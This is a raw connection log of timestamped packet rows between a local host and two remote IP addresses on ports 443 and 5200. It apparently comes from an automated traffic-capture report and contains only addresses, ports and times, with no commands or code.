Dec 9, 2024 07:37:32.298906088 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.298913002 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.298937082 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.298955917 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.306965113 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.306983948 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.307163000 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.307173967 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.307215929 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556155920 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556166887 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556209087 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556301117 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556318045 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556335926 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556354046 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556446075 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556451082 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556503057 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556525946 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556540012 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556540012 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556575060 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556588888 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556595087 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556602955 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556602955 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556667089 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556673050 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556708097 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556765079 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556782961 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556816101 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556821108 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556843996 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556852102 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556869030 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556884050 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556902885 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556905031 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556912899 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556960106 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556965113 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.556966066 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556976080 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.556991100 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557023048 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557029963 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557044983 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557125092 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557137966 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557163954 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557183027 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557183027 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557193041 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557223082 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557229996 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557260036 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557281017 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557308912 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557328939 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557353020 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557358980 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557382107 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557383060 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557396889 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557401896 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557416916 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557430029 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557465076 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557468891 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557471037 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557482958 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557518959 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557526112 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557533026 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557558060 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557559967 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557590008 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557617903 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557625055 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557636976 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557651043 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557671070 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557684898 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557715893 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557732105 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557750940 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557758093 CET | 443 | 49738 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.557795048 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.557795048 CET | 49738 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.558038950 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.566744089 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.566761017 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.566817999 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.566836119 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.566864967 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.572287083 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.572305918 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.572344065 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.572350979 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.572382927 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.578110933 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.578125954 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.578167915 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.578176975 CET | 443 | 49737 | 154.216.20.243 | 192.168.2.4
Dec 9, 2024 07:37:32.578210115 CET | 49737 | 443 | 192.168.2.4 | 154.216.20.243
Dec 9, 2024 07:37:32.578950882 CET | 5200 | 49739 | 185.157.162.216 | 192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.579060078 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:32.579169035 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.579181910 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.579221010 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.579236031 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.583178997 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.583198071 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.583234072 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.583242893 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.583277941 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.585485935 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.585505009 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.585535049 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.585546970 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.585572004 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.589200974 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.589215994 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.589265108 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.589272976 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.589297056 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.594125032 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.594144106 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.594173908 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.594181061 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.594223022 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.631699085 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.647336960 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.670942068 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.670958042 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.671078920 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.671107054 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.671149015 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.673214912 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.673237085 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.673305988 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.673315048 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.673356056 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.677453995 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.677474022 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.677546024 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.677562952 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.677606106 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.678843021 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.678865910 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.678924084 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.678931952 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.678972960 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.682565928 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.682586908 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.682656050 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.682666063 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.682706118 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.688751936 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.688767910 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.688838959 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.688853025 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.688893080 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.694530010 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.694545984 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.694616079 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.694628000 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.694668055 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.698321104 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.698388100 CET497395200192.168.2.4185.157.162.216
                                                                                                          Dec 9, 2024 07:37:32.700969934 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.700984001 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.701072931 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.701083899 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.701122999 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.759421110 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.759439945 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.759494066 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.759510994 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.759566069 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.764448881 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.764467955 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.764509916 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.764517069 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.764530897 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.764560938 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.770083904 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.770100117 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.770155907 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.770164013 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.770203114 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.771708012 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.771725893 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.771775007 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.771790981 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.771893978 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.775856018 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.775871992 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.775928974 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.775937080 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.775979996 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.777121067 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.777134895 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.777190924 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.777201891 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.777240038 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.781174898 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.781191111 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.781258106 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.781265974 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.781306028 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.786890984 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.786906004 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.786966085 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.786976099 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.787017107 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.817857027 CET520049739185.157.162.216192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.863395929 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.863410950 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.863517046 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.863533974 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.863579035 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.865595102 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.865613937 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.865683079 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.865690947 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.865732908 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.869668007 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.869688034 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.869729996 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.869739056 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.869769096 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.869785070 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.871145964 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.871170998 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.871225119 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.871232033 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.871268034 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.871290922 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.874927998 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.874943018 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.875013113 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.875020981 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.875062943 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.881086111 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.881100893 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.881162882 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.881171942 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.881211042 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.886930943 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.886945963 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.887001038 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.887015104 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.887057066 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.892976046 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.892990112 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.893030882 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.893045902 CET44349738154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.893059015 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.893121958 CET49738443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.948187113 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.948257923 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.948270082 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.948281050 CET44349737154.216.20.243192.168.2.4
                                                                                                          Dec 9, 2024 07:37:32.948314905 CET49737443192.168.2.4154.216.20.243
                                                                                                          Dec 9, 2024 07:37:32.948348999 CET49737443192.168.2.4154.216.20.243
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 9, 2024 07:37:32.948605061 CET  49737        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:32.948617935 CET  443          49737      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.948627949 CET  49737        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:32.948632956 CET  443          49737      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.963674068 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.963690042 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.963747025 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:32.963767052 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.963805914 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:32.969722986 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.969736099 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.969783068 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:32.969799042 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:32.969841957 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.055572987 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.055588007 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.055675983 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.055691004 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.055737972 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.061633110 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.061647892 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.061712027 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.061727047 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.061763048 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.066945076 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.066960096 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.067028046 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.067040920 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.067081928 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.073115110 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.073129892 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.073183060 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.073198080 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.073240995 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.078886032 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.078928947 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.078982115 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.078999043 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.079021931 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.079041958 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.085449934 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.085464954 CET  443          49738      154.216.20.243   192.168.2.4
Dec 9, 2024 07:37:33.085535049 CET  49738        443        192.168.2.4      154.216.20.243
Dec 9, 2024 07:37:33.085551023 CET  443          49738      154.216.20.243   192.168.2.4
